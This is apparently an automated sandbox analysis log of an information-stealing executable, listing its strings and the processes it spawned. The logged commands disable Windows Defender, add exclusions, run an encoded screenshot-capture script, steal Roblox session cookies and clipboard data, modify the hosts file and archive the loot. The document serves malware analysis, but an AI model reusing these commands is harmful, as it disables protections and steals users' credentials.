Source: ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: ahost.exe, ahost.exe, 00000002.00000002.1878537582.00007FF8E7331000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: ahost.exe

ReversingLabs: Detection: 36%

Source: ahost.exe	String found in binary or memory: set-addPolicy
Source: ahost.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\ahost.exe

File read: C:\Users\user\Desktop\ahost.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ahost.exe "C:\Users\user\Desktop\ahost.exe"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Users\user\Desktop\ahost.exe "C:\Users\user\Desktop\ahost.exe"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46FF.tmp" "c:\Users\user\AppData\Local\Temp\ohbt5slp\CSC3D7213846C3143A1A5A1261A2A30979.TMP"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\ahost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
